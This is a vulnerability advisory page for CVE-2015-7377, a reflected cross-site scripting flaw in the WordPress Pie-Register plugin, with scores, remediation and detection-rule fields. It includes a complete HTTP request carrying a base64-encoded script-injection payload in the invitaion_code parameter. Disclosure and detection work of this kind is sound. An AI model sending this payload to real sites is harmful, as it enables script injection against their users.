🔙 목록으로 돌아가기

CVE-2015-7377: WordPress Pie-Register <2.0.19 - Cross-Site Scripting

TitleWordPress Pie-Register <2.0.19 - Cross-Site Scripting
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
RemediationUpdate to the latest version of the WordPress Pie-Register plugin (2.0.19 or higher) to mitigate this vulnerability.
CVSS Score4.3
EPSS Score0.05825
CVE IDCVE-2015-7377
CWE IDCWE-79
Tags cve cve2015 wordpress wp-plugin xss packetstorm genetechsolutions vuln

🔍 Vulnerability Description

WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL.

🌐 HTTP Request

GET /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-7377.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-7377.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A